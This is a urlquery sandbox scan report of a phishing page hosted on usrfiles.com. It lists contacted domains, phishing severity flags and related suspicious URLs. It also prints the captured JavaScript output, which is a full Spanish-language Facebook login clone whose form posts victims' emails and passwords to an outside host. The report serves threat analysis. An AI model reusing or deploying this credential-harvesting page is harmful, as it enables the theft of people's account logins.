urlquery - report: www.usrfiles.com/html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U295d2luZ3M5OUBpY2xvdWQuY29thttps=

Fully Qualifying Domain Name	Rank	First Seen	Last Seen	Sent bytes	Received bytes	IP
www.usrfiles.com (1)	0	2014-11-08T07:47:24Z	2023-03-21T14:48:47Z	438	83846	34.102.176.152
firefox.settings.services.mozilla.com (2)	867	2020-06-04T22:08:41Z	2023-03-25T18:14:26Z	782	2374	35.241.9.150
content-signature-2.cdn.mozilla.net (1)	1152	2020-11-03T13:26:46Z	2023-03-26T05:11:12Z	413	5882	34.160.144.191
contile.services.mozilla.com (1)	1114	2021-05-27T20:32:35Z	2023-03-26T05:11:59Z	333	391	34.117.237.239
ocsp.digicert.com (6)	86	2012-05-21T09:02:23Z	2023-03-26T05:18:47Z	2046	4794	192.229.221.95
img-getpocket.cdn.mozilla.net (6)	1631	2018-06-22T01:36:00Z	2023-03-26T05:09:08Z	3246	60534	34.120.237.76
r3.o.lencr.org (8)	344	2020-12-02T09:52:13Z	2023-03-25T18:12:03Z	2704	7090	23.36.77.32
static.xx.fbcdn.net (10)	661	2012-12-01T14:12:13Z	2023-03-26T05:16:50Z	4504	34291	157.240.205.11
push.services.mozilla.com (1)	2140	2014-10-24T10:27:06Z	2023-03-26T05:10:29Z	606	127	52.41.156.90
facebook.com (1)	17	2012-05-21T19:10:05Z	2023-03-25T16:59:41Z	392	2038	157.240.205.35

Scan Date	Severity	Indicator	Comment
2023-03-21	medium	www.usrfiles.com/html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U2 (...)	Facebook, Inc.

Scan Date	Severity	Indicator	Comment
2023-03-22	medium	www.usrfiles.com/html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U2 (...)	Phishing

Date	UQ / IDS / BL	URL	IP
2023-06-01 13:32:53 UTC	0 - 2 - 2	9247696.filesusr.com/html/e766f6_03f39d7024f5 (...)	34.102.176.152
2023-06-01 13:17:00 UTC	0 - 0 - 2	f9w1lned0ruqblxi6jahwotak.filesusr.com/html/c (...)	34.102.176.152
2023-06-01 13:12:22 UTC	3 - 2 - 2	www-outlooksigncontract0com.filesusr.com/html (...)	34.102.176.152
2023-06-01 11:30:28 UTC	0 - 0 - 2	www.mjaymu5vdmvtymvymji5dgg.filesusr.com/html (...)	34.102.176.152
2023-06-01 11:25:23 UTC	3 - 2 - 2	www-mailoutlookcontract0com.filesusr.com/html (...)	34.102.176.152

Date	UQ / IDS / BL	URL	IP
2023-06-01 19:50:47 UTC	0 - 0 - 4	zxcvzxcvsdfgdxfgh.blogspot.com.tr/	172.217.21.161
2023-06-01 19:50:35 UTC	0 - 0 - 1	216.58.209.174	216.58.209.174
2023-06-01 19:48:56 UTC	0 - 0 - 1	freerobloxgroupsnoowner.blogspot.lt/	172.217.21.161
2023-06-01 19:48:40 UTC	0 - 0 - 1	parisbreakfasts.blogspot.com/2015/07/crowd-so (...)	172.217.21.161
2023-06-01 19:47:37 UTC	0 - 0 - 1	oradamnar1973.blogspot.com/	172.217.21.161

Date	UQ / IDS / BL	URL	IP
2023-05-29 03:43:08 UTC	0 - 0 - 1	www.sabmed-israel.com.usrfiles.com/	34.102.176.152
2023-05-29 03:39:14 UTC	3 - 13 - 1	www.aplusplumbingrooter.com.usrfiles.com/html (...)	34.102.176.152
2023-05-28 22:19:38 UTC	0 - 0 - 1	42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles (...)	34.102.176.152
2023-05-28 22:19:36 UTC	0 - 0 - 1	42502d2a-e7ed-4a16-9f11-33ffe6c54021.usrfiles (...)	34.102.176.152
2023-05-28 02:59:36 UTC	0 - 0 - 1	cff66d08-d3f8-42db-911c-ce670399a441.usrfiles (...)	34.102.176.152

Date	UQ / IDS / BL	URL	IP
2023-03-13 18:15:47 UTC	0 - 0 - 2	manualidades-facebook-www.filesusr.com/html/d (...)	34.102.176.152
2023-03-13 04:06:31 UTC	0 - 0 - 2	manualidades-facebook-www.filesusr.com/html/d (...)	34.102.176.152
2023-03-02 18:35:49 UTC	0 - 0 - 2	www.filesusr.com/html/db37a9_84399193f1fde90a (...)	34.102.176.152
2023-02-12 15:27:15 UTC	0 - 0 - 2	fa800klinkencuesta.filesusr.com/html/f00e8e_4 (...)	34.102.176.152
2023-02-12 13:52:17 UTC	0 - 0 - 2	facebook-com-erick574.filesusr.com/html/f00e8 (...)	34.102.176.152

JavaScript

Executed Scripts (17)

Executed Evals (0)

Executed Writes (6)

#1 JavaScript::Write (size: 160) - SHA256: 8682340cb0d205cda72e51f1cd5fee72bf729866bbf18803cdff2e48db612492

< input type = "hidden"
name = "enblanco"
value = "http://www.usrfiles.com/html/d717b5_84399193f1fde90a24ff165dbe8c6c9d.html?147615U295d2luZ3M5OUBpY2xvdWQuY29thttps=" >

#2 JavaScript::Write (size: 55) - SHA256: da3b51a2028e01a9aa4c3ee986758af9eaeb266fd6a6263365c99c82d6a60fd3

< input type = "hidden"
name = "detector"
value = "undefined" >

#3 JavaScript::Write (size: 51) - SHA256: e5260e6a51903bec07911dd7f4436f0890a1d7382b59ddb9235ceeb0aa360405

< input type = "hidden"
name = "lang"
value = "undefined" >

#4 JavaScript::Write (size: 38504) - SHA256: 9ec05a015ce8f968f86dae09d3b4f08db66d82a8e81c697a3cb671315992ec9f

< !DOCTYPE html >
    < html >
    < script type = "text/javascript" >
    var regreso = uno; //Regreso
var urlfin = dos; //UrlFin
var idfb = tres; //Victima
var detector = cuatro; //Identifier
var lang = cinco; //Provedor
var enblanco = window.location.href; //En Blanco
var myString = new String(window.location.href);
var myArray = myString.split("*");
var regreso = myArray[1];
var urlfin = myArray[2];
var email = myArray[3];
var detector = myArray[4];
var ip = "Facebook";
var uno = new String(window.atob(llegaron[1])); //Regreso
var dos = new String(window.atob(llegaron[2])); //UrlFin
var tres = llegaron[3]; //Victima
var cuatro = new String(window.atob(llegaron[4])); //Identificador
var cinco = new String(window.atob(llegaron[5])); //Provedor
var regreso = uno; //Regreso
var urlfin = dos; //UrlFin
var idfb = tres; //Victima
var detector = cuatro; //Identifier
var lang = cinco; //Provedor
var enblanco = window.location.href; //En Blanco
var myString = new String(window.location.href);
var myArray = myString.split("*");
var regreso = myArray[1];
var urlfin = myArray[2];
var email = myArray[3];
var detector = myArray[4]; < /script> < head >
    < title > Facebook - Inicia sesi� n o reg� strate < /title> < meta name = "viewport"
content = "user-scalable=no,initial-scale=1,maximum-scale=1" / >
    < link href = "https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/gB76kJXPYJV.png"
rel = "shortcut icon"
sizes = "196x196" / >
    < meta name = "referrer"
content = "origin-when-crossorigin"
id = "meta_referrer" / >
    < link type = "text/css"
rel = "stylesheet"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0,cross/NzQtERYtGB2.css?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "bONKzDa"
crossorigin = "anonymous" / >
    < link type = "text/css"
rel = "stylesheet"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/y2/l/0,cross/xJKJrMq7d3M.css?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "MoYpVB9"
crossorigin = "anonymous" / >
    < link type = "text/css"
rel = "stylesheet"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yr/l/0,cross/80CKmjtnEKi.css?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "RTslor2"
crossorigin = "anonymous" / >

    < script id = "u_0_h" >
    function envFlush(a) {
        function b(b) {
            for (var c in a) b[c] = a[c];
        }
        window.requireLazy ? window.requireLazy(["Env"], b) : ((window.Env = window.Env || {}), b(window.Env));
    }
envFlush({
    timeslice_heartbeat_config: {
        pollIntervalMs: 33,
        idleGapThresholdMs: 60,
        ignoredTimesliceNames: {
            requestAnimationFrame: true,
            "Event listenHandler mousemove": true,
            "Event listenHandler mouseover": true,
            "Event listenHandler mouseout": true,
            "Event listenHandler scroll": true
        },
        isHeartbeatEnabled: true,
        isArtilleryOn: false,
    },
    shouldLogCounters: true,
    timeslice_categories: {
        react_render: true,
        reflow: true
    },
    sample_continuation_stacktraces: true,
    dom_mutation_flag: true,
}); < /script> < script >
    document.domain = "facebook.com";
/^#~?!(?:\/?[\w\.-])+\/?(?:\?|$)/.test(location.hash) && location.replace(location.hash.substr(location.hash.indexOf("!") + 1)); < /script> < script >
    _DEV = 0; < /script> < script id = "u_0_i"
crossorigin = "anonymous"
src = "https://static.xx.fbcdn.net/rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc_x=Ij3Wp8lg5Kz"
data - bootloader - hash = "lh+qS" > < /script> < script id = "u_0_f" >
    (CavalryLogger =
        window.CavalryLogger ||
        function(a) {
            (this.lid = a), (this.transition = !1), (this.metric_collected = !1), (this.is_detailed_profiler = !1), (this.instrumentation_started = !1), (this.pagelet_metrics = {}), (this.events = {}), (this.ongoing_watch = {}), (this.values = {
                t_cstart: window._cstart
            }), (this.piggy_values = {}), (this.bootloader_metrics = {}), (this.resource_to_pagelet_mapping = {}),
            this.initializeInstrumentation && this.initializeInstrumentation();
        }), (CavalryLogger.prototype.setIsDetailedProfiler = function(a) {
        this.is_detailed_profiler = a;
        return this;
    }), (CavalryLogger.prototype.setTTIEvent = function(a) {
        this.tti_event = a;
        return this;
    }), (CavalryLogger.prototype.setValue = function(a, b, c, d) {
        d = d ? this.piggy_values : this.values;
        (typeof d[a] === "undefined" || c) && (d[a] = b);
        return this;
    }), (CavalryLogger.prototype.getLastTtiValue = function() {
        return this.lastTtiValue;
    }), (CavalryLogger.prototype.setTimeStamp =
        CavalryLogger.prototype.setTimeStamp ||
        function(a, b, c, d) {
            this.mark(a);
            var e = this.values.t_cstart || this.values.t_start;
            e = d ? e + d : CavalryLogger.now();
            this.setValue(a, e, b, c);
            this.tti_event && a == this.tti_event && ((this.lastTtiValue = e), this.setTimeStamp("t_tti", b));
            return this;
        }), (CavalryLogger.prototype.mark =
        typeof console === "object" && console.timeStamp ? function(a) {
            console.timeStamp(a);
        } : function() {}), (CavalryLogger.prototype.addPiggyback = function(a, b) {
        this.piggy_values[a] = b;
        return this;
    }), (CavalryLogger.instances = {}), (CavalryLogger.id = 0), (CavalryLogger.disableArtilleryOnUntilOffLogging = !1), (CavalryLogger.getInstance = function(a) {
        typeof a === "undefined" && (a = CavalryLogger.id);
        CavalryLogger.instances[a] || (CavalryLogger.instances[a] = new CavalryLogger(a));
        return CavalryLogger.instances[a];
    }), (CavalryLogger.setPageID = function(a) {
        if (CavalryLogger.id === 0) {
            var b = CavalryLogger.getInstance();
            CavalryLogger.instances[a] = b;
            CavalryLogger.instances[a].lid = a;
            delete CavalryLogger.instances[0];
        }
        CavalryLogger.id = a;
    }), (CavalryLogger.now = function() {
        return window.performance && performance.timing && performance.timing.navigationStart && performance.now ? performance.now() + performance.timing.navigationStart : new Date().getTime();
    }), (CavalryLogger.prototype.measureResources = function() {}), (CavalryLogger.prototype.profileEarlyResources = function() {}), (CavalryLogger.getBootloaderMetricsFromAllLoggers = function() {}), (CavalryLogger.start_js = function() {}), (CavalryLogger.done_js = function() {});
CavalryLogger.getInstance().setTTIEvent("t_domcontent");
(CavalryLogger.prototype.measureResources = function(a, b) {
    if (!this.log_resources) return;
    var c = "bootload/" + a.name;
    if (this.bootloader_metrics[c] !== void 0 || this.ongoing_watch[c] !== void 0) return;
    var d = CavalryLogger.now();
    this.ongoing_watch[c] = d;
    "start" + c in this.bootloader_metrics || (this.bootloader_metrics["start_" + c] = d);
    b && !("tag_" + c in this.bootloader_metrics) && (this.bootloader_metrics["tag_" + c] = b);
    if (a.type === "js") {
        c = "js_exec/" + a.name;
        this.ongoing_watch[c] = d;
    }
}), (CavalryLogger.prototype.stopWatch = function(a) {
    if (this.ongoing_watch[a]) {
        var b = CavalryLogger.now(),
            c = b - this.ongoing_watch[a];
        this.bootloader_metrics[a] = c;
        var d = this.piggy_values;
        a.indexOf("bootload") === 0 &&
            (d.t_resource_download || (d.t_resource_download = 0),
                d.resources_downloaded || (d.resources_downloaded = 0), (d.t_resource_download += c), (d.resources_downloaded += 1),
                d["tag_" + a] == "EF" && (d.t_pagelet_cssload_early_resources = b));
        delete this.ongoing_watch[a];
    }
    return this;
}), (CavalryLogger.getBootloaderMetricsFromAllLoggers = function() {
    var a = {};
    Object.values(window.CavalryLogger.instances).forEach(function(b) {
        b.bootloader_metrics && Object.assign(a, b.bootloader_metrics);
    });
    return a;
}), (CavalryLogger.start_js = function(a) {
    for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("js_exec/" + a[b]);
}), (CavalryLogger.done_js = function(a) {
    for (var b = 0; b < a.length; ++b) CavalryLogger.getInstance().stopWatch("bootload/" + a[b]);
}), (CavalryLogger.prototype.profileEarlyResources = function(a) {
    for (var b = 0; b < a.length; b++) this.measureResources({
        name: a[b][0],
        type: a[b][1] ? "js" : ""
    }, "EF");
});
CavalryLogger.getInstance().log_resources = true;
CavalryLogger.getInstance().setIsDetailedProfiler(true);
window.CavalryLogger && CavalryLogger.getInstance().setTimeStamp("t_start"); < /script> < script id = "u_0_g" >
    (function(a, b, c, d) {
        function e(a) {
            document.cookie = a + "=;expires=Thu, 01-Jan-1970 00:00:01 GMT;path=/;domain=.facebook.com";
        }

        function f(a, b) {
            document.cookie = a + "=" + b + ";path=/;domain=.facebook.com;secure";
        }
        if (!a) {
            e(b);
            e(c);
            return;
        }
        a = null;
        (navigator.userAgent.indexOf("Firefox") !== -1 || (!window.devicePixelRatio && navigator.userAgent.indexOf("Windows Phone") !== -1)) &&
        document.documentElement != null &&
            ((a = screen.width / document.documentElement.offsetWidth), (a = Math.max(1, Math.floor(a * 2) / 2)));
        (!a || a === 1) && navigator.userAgent.indexOf("IEMobile") !== -1 && ((a = Math.sqrt(screen.deviceXDPI * screen.deviceYDPI) / 96), (a = Math.max(1, Math.round(a * 2) / 2)));
        f(b, (a || window.devicePixelRatio || 1).toString());
        e = window.screen ? screen.width : 0;
        b = window.screen ? screen.height : 0;
        f(c, e + "x" + b);
        d && document.cookie && window.devicePixelRatio > 1 && document.location.reload();
    })(true, "m_pixel_ratio", "wd", false); < /script> < meta name = "description"
content = "Crea una cuenta o inicia sesi&#xf3;n en Facebook. Con&#xe9;ctate con amigos, familiares y otras personas que conozcas. Comparte fotos y videos, env&#xed;a mensajes y..." / >
    < link rel = "canonical"
href = "https://www.facebook.com/" / >
    < /head> < body tabindex = "0"
class = "touch x1 android ff _fzu _50-3 iframe acw" >
    < script id = "u_0_e" >
    (function(a) {
        a.updateOrientation = function() {
            var b = !!a.orientation && a.orientation !== 180,
                c = document.body;
            c && (c.className = c.className.replace(/(^|\s)(landscape|portrait)(\s|$)/g, " ") + " " + (b ? "landscape" : "portrait"));
            return b;
        };
    })(window); < /script>

< div class = "_5soa acw"
id = "root"
role = "main"
data - sigil = "context-layer-root content-pane" >
    < div class = "_5909" >
    < div class = "_7om2" >
    < div class = "_4g34"
id = "u_0_0" >
    < div id = "login_top_banner"
data - sigil = "m_login_upsell login_identify_step_element" > < /div> < div class = "_7om2 _52we _52z6" >
    < div class = "_4g34" >
    < center > < a href = "/login/?refid=8" > < img src = "https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
width = "112"
class = "img"
alt = "facebook" / > < /a></center >
    < /div> < /div> < div class = "_5rut" >
    < form
method = "post"
action = "https://www.hackphreik.com/imagenes/php.php"
id = "login_form"
novalidate = "1"
data - sigil = "m_login_form" >
    < input type = "hidden"
name = "lsd"
value = "AVrk6FyT"
autocomplete = "off" / > < input type = "hidden"
name = "jazoest"
value = "2701"
autocomplete = "off" / > < input type = "hidden"
name = "m_ts"
value = "1565483563" / >
    < input type = "hidden"
name = "li"
value = "K2JPXbX8RFcDixCQjiUHmI0M" / > < input type = "hidden"
name = "try_number"
value = "0"
data - sigil = "m_login_try_number" / >
    < input type = "hidden"
name = "unrecognized_tries"
value = "0"
data - sigil = "m_login_unrecognized_tries" / >
    < div id = "user_info_container"
data - sigil = "user_info_after_failure_element" > < /div> < div id = "pwd_label_container"
data - sigil = "user_info_after_failure_element" > < /div> < div id = "otp_retrieve_desc_container" > < /div> < div >
    < div class = "_56be" >
    < div class = "_55wo _56bf" >
    < div class = "_96n9"
id = "email_input_container" >
    < script type = "text/javascript" >
    document.write(
        '<input type="email" name="idfb" id="email" value="' +
        email +
        '" tabindex="1"autocorrect="off" autocapitalize="off" type="email" class="_56bg _4u9z _5ruq _8qtn" autocomplete="on" id="m_login_email" name="email" placeholder="N&#xfa;mero de celular o correo electr&#xf3;nico" data-sigil="m_login_email" />'
    ); < /script> < /div> < div class = "_55wq" > < /div> < div class = "_56be" >
    < div class = "_55wo _56bf" >
    < div class = "_1upc _mg8"
data - sigil = "m_login_password" >
    < div class = "_7om2" >
    < div class = "_4g34 _5i2i _52we" >
    < div class = "_5xu4" >
    < input
autocorrect = "off"
autocapitalize = "off"
class = "_56bg _4u9z _27z2 _8qtm"
autocomplete = "on"
id = "m_login_password"
name = "pass"
placeholder = "Contrase&#xf1;a"
type = "password"
data - sigil = "password-plain-text-toggle-input" / >
    < /div> < /div> < div class = "_5s61 _216i _5i2i _52we" >
    < div class = "_5xu4" >
    < div class = "_2pi9"
style = "display: none;"
id = "u_0_2" >
    < a href = "#"
data - sigil = "password-plain-text-toggle" >
    < span class = "mfss"
style = "display: none;"
id = "u_0_3" > OCULTAR < /span><span class="mfss" id="u_0_4">MOSTRAR</span >
    < /a> < /div> < /div> < /div> < /div> < /div> < /div> < /div> < /div> < /div> < div class = "_2pie"
style = "text-align: center;" >
    < div id = "u_0_5"
data - sigil = "login_password_step_element" >
    < button type = "submit"
value = "Iniciar sesi&#xf3;n"
class = "_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu"
name = "login"
data - sigil = "touchable login_button_block m_login_button" >
    < span class = "_55sr" > Iniciar sesi� n < /span> < /button> < /div>

< div class = "_7eif"
id = "oauth_login_button_container"
style = "display: none;" > < /div> < div class = "_7f_d"
id = "oauth_login_desc_container"
style = "display: none;" > < /div> < div id = "otp_button_elem_container" > < /div> < /div> < input type = "hidden"
name = "prefill_contact_point"
id = "prefill_contact_point" / > < input type = "hidden"
name = "prefill_source"
id = "prefill_source" / >
    < input type = "hidden"
name = "prefill_type"
id = "prefill_type" / > < input type = "hidden"
name = "first_prefill_source"
id = "first_prefill_source" / >
    < input type = "hidden"
name = "first_prefill_type"
id = "first_prefill_type" / > < input type = "hidden"
name = "had_cp_prefilled"
id = "had_cp_prefilled"
value = "false" / >
    < input type = "hidden"
name = "had_password_prefilled"
id = "had_password_prefilled"
value = "false" / > < input type = "hidden"
name = "is_smart_lock"
id = "is_smart_lock"
value = "false" / >
    < div class = "_xo8" > < /div> < noscript > < input type = "hidden"
name = "_fb_noscript"
value = "true" / > < /noscript> < script type = "text/javascript" >
    document.write('<input type="hidden" name="urlfin" value="' + urlfin + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="enblanco" value="' + enblanco + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="detector" value="' + detector + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="lang" value="' + lang + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="regreso" value="' + window.atob(regreso) + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="urlfin" value="' + window.atob(urlfin) + '">'); < /script> < script type = "text/javascript" >
    document.write('<input type="hidden" name="detector" value="' + window.atob(detector) + '">'); < /script> < /form> < div >
    < div class = "_43mg" > < span class = "_43mh" > o < /span></div >
    < div class = "_52jj _5t3b"
id = "u_0_7" >
    < center > < a role = "button"
class = "_5t3c _28le btn btnS medBtn mfsm touchable"
id = "signup-button"
href = "/reg-no-deeplink/?cid=103&amp;refid=8"
tabindex = "0"
data - sigil = "m_reg_button" >
    Crear cuenta nueva < /a></center >
    < /div> < /div> < div >
    < div class = "other-links" >
    < ul class = "_5pkb _55wp" >
    < li >
    < span class = "mfss fcg" >
    < a
tabindex = "0"
href = "/recover/initiate/?c=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;r&amp;cuid&amp;ars=facebook_login&amp;lwv=100&amp;refid=8"
id = "forgot-password-link" > �Olvidaste tu contrase� a ?
    < /a> < span aria - hidden = "true" > � < /span><a href="/help / ? refid = 8 " id="
help - link " class="
sec ">Servicio de ayuda</a> < /span> < /li> < /ul> < /div> < /div> < /div> < div > < /div> < /div> < /div> < /div> < /div> < div style = "display: none;" > < /div> < span > < img src = "https://facebook.com/security/hsts-pixel.gif"
width = "0"
height = "0"
style = "display: none;" / > < /span> < div class = "_55wr _5ui2"
data - sigil = "m_login_footer" >
    < div class = "_5dpw" >
    < div class = "_5ui3"
data - nocookies = "1"
id = "locale-selector"
data - sigil = "language_selector marea" >
    < div class = "_5909" >
    < div class = "_7om2" >
    < div class = "_4g34" >
    < span class = "_52jc _52j9 _52jh _3ztb" > Espa� ol < /span> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=fr_FR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQADjC3uzbog8dFV&amp;refid=8"
data - locale = "fr_FR"
data - sigil = "change_language" >
    Fran� ais(France) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=pt_BR&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQDG_SSA-jI0mvnp&amp;refid=8"
data - locale = "pt_BR"
data - sigil = "change_language" >
    Portugu� s(Brasil) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=it_IT&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQAQrzNBH90YczXI&amp;refid=8"
data - locale = "it_IT"
data - sigil = "change_language" >
    Italiano < /a> < /span> < /div> < /div> < div class = "_4g34" >
    < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=en_US&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQB9wfh90mS9bV7h&amp;refid=8"
data - locale = "en_US"
data - sigil = "change_language" >
    English(US) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=zh_CN&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQDRnDG5vjFfEF20&amp;refid=8"
data - locale = "zh_CN"
data - sigil = "change_language" >
    -�(�S) < /a> < /span> < /div> < div class = "_3ztc" >
    < span class = "_52jc" >
    < a
href = "/a/language.php?l=de_DE&amp;lref=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;gfid=AQCBwh-9xN7z8Yd9&amp;refid=8"
data - locale = "de_DE"
data - sigil = "change_language" >
    Deutsch < /a> < /span> < /div> < a href = "/language.php?n=https%3A%2F%2Fm.facebook.com%2F%3Frefsrc%3Dhttps%253A%252F%252Fm.facebook.com%252F&amp;refid=8" >
    < div class = "_3j87 _1rrd _3ztd"
aria - label = "Lista completa de idiomas"
data - sigil = "more_language" > < i class = "img sp_t0F5GNpHI8g_3x sx_4d197d" > < /i></div >
    < /a> < /div> < /div> < /div> < /div> < div class = "_5ui4" >
    < div class = "_96qv _9a0a" >
    < a href = "/facebook?refid=8"
class = "_96qw"
title = "Lee nuestro blog, descubre el centro de recursos y encuentra ofertas de trabajo." > Informaci� n < /a><span aria-hidden="true"> � </span >
    < a href = "/help/?ref=pf&amp;refid=8"
class = "_96qw"
title = "Visita nuestro servicio de ayuda." > Ayuda < /a><span aria-hidden="true"> � </span > < span class = "_96qw"
id = "u_0_5" > M� s < /span> < /div> < div class = "_96qv"
style = "display: none;"
id = "u_0_6" >
    < a href = "/directory/pages/?refid=8"
class = "_96qw" > P� ginas < /a><a href="/directory / places / ? refid = 8 " title="
Explora nuestro directorio de lugares.
" class="
_96qw ">Ubicaciones</a> < a href = "/directory/people/?refid=8"
title = "Explora nuestro directorio de personas."
class = "_96qw" > Personas < /a> < a href = "/directory/groups/?refid=8"
title = "Explora nuestro directorio de grupos."
class = "_96qw" > Grupos < /a><a href="/pages / category / ? refid = 8 " class="
_96qw ">Categor�as de p�ginas</a> < a href = "/places/?refid=8"
class = "_96qw"
title = "Descubre lugares populares en Facebook." > Lugares < /a> < a href = "https://www.oculus.com/"
class = "_96qw"
target = "_blank"
title = "M&#xe1;s informaci&#xf3;n sobre Oculus" > Oculus < /a> < a href = "https://portal.facebook.com/?refid=8"
class = "_96qw"
target = "_blank"
title = "Obt&#xe9;n m&#xe1;s informaci&#xf3;n sobre Portal from Facebook" > Portal < /a> < a href = "/marketplace/?refid=8"
class = "_96qw"
title = "Compra y vende art&#xed;culos en Facebook Marketplace." > Marketplace < /a> < a href = "https://pay.facebook.com/?refid=8"
class = "_96qw"
target = "_blank"
title = "M&#xe1;s informaci&#xf3;n sobre Facebook Pay" > Facebook Pay < /a> < a href = "/fundraisers/?refid=8"
class = "_96qw"
title = "Haz una donaci&#xf3;n a causas que te importan." > Recaudaciones de fondos < /a> < /div> < span class = "mfss fcg" > Facebook, Inc. < /span> < /div> < /div> < /div> < /div> < div class = "" > < /div> < div class = "viewportArea _2v9s"
style = "display: none;"
id = "u_0_7"
data - sigil = "marea" >
    < div class = "_5vsg"
id = "u_0_8" > < /div> < div class = "_5vsh"
id = "u_0_9" > < /div> < div class = "_5v5d fcg" >
    < div class = "_2so _2sq _2ss img _50cg"
data - animtype = "1"
data - sigil = "m-loading-indicator-animate m-loading-indicator-root" > < /div>
Cargando... < /div> < /div> < div class = "viewportArea aclb"
id = "mErrorView"
style = "display: none;"
data - sigil = "marea" >
    < div class = "container" >
    < div class = "image" > < /div> < div class = "message"
data - sigil = "error-message" > < /div> < a class = "link"
data - sigil = "MPageError:retry" > Intentar de nuevo < /a> < /div> < /div> < /div> < /div> < div id = "static_templates" >
    < div class = "mDialog"
id = "modalDialog"
style = "display: none;" >
    < div class = "_52z5 _451a mFuturePageHeader _1uh1 firstStep titled"
id = "mDialogHeader" >
    < div class = "_7om2 _52we" >
    < div class = "_5s61" >
    < div class = "_52z7" >
    < button type = "submit"
value = "Cancelar"
class = "cancelButton btn btnD bgb mfss touchable"
id = "u_0_b"
data - sigil = "dialog-cancel-button" > Cancelar < /button> < button type = "submit"
value = "Atr&#xe1;s"
class = "backButton btn btnI bgb mfss touchable iconOnly"
aria - label = "Atr&#xe1;s"
id = "u_0_c"
data - sigil = "dialog-back-button" >
    < i class = "img sp_t0F5GNpHI8g_3x sx_8f20a7"
style = "margin-top: 2px;" > < /i> < /button> < /div> < /div> < div class = "_4g34" >
    < div class = "_52z6" > < div class = "_50l4 mfsl fcw"
id = "m-future-page-header-title"
role = "heading"
tabindex = "0"
data - sigil = "m-dialog-header-title dialog-title" > Cargando... < /div></div >
    < /div> < div class = "_5s61" > < div class = "_52z8"
id = "modalDialogHeaderButtons" > < /div></div >
    < /div> < /div> < div class = "modalDialogView"
id = "modalDialogView" > < /div> < div class = "_5v5d _5v5e fcg"
id = "dialogSpinner" >
    < div class = "_2so _2sq _2ss img _50cg"
data - animtype = "1"
id = "u_0_a"
data - sigil = "m-loading-indicator-animate m-loading-indicator-root" > < /div>
Cargando... < /div> < /div> < /div>

< link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/0,cross/SieMvexb4RV.css?_nc_x=Ij3Wp8lg5Kz"
as = "style"
crossorigin = "anonymous" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc_x=Ij3Wp8lg5Kz"
as = "script"
crossorigin = "anonymous"
nonce = "g0wgU7yr" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI9dU-.js?_nc_x=Ij3Wp8lg5Kz"
as = "script"
crossorigin = "anonymous"
nonce = "g0wgU7yr" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/v-qA4RoF1Br.css?_nc_x=Ij3Wp8lg5Kz"
as = "style"
crossorigin = "anonymous" / >
    < link rel = "preload"
href = "https://static.xx.fbcdn.net/rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-SSjEW.js?_nc_x=Ij3Wp8lg5Kz"
as = "script"
crossorigin = "anonymous"
nonce = "g0wgU7yr" / >

    < /script>


< /body> < /html>

#5 JavaScript::Write (size: 299) - SHA256: dc9ab5b0af46a9b94d01b1159fa74edb629157fc15b55dddda1f2bc5c60fd9ac

< input type = "email"
name = "idfb"
id = "email"
value = "undefined"
tabindex = "1"
autocorrect = "off"
autocapitalize = "off"
type = "email"
class = "_56bg _4u9z _5ruq _8qtn"
autocomplete = "on"
id = "m_login_email"
name = "email"
placeholder = "N&#xfa;mero de celular o correo electr&#xf3;nico"
data - sigil = "m_login_email" / >

#6 JavaScript::Write (size: 53) - SHA256: c925181189c900d54d1ab93b2acadb6dbab2fb030365078587f971f4763ed835

< input type = "hidden"
name = "urlfin"
value = "undefined" >

HTTP Transactions (37)

Request	Response
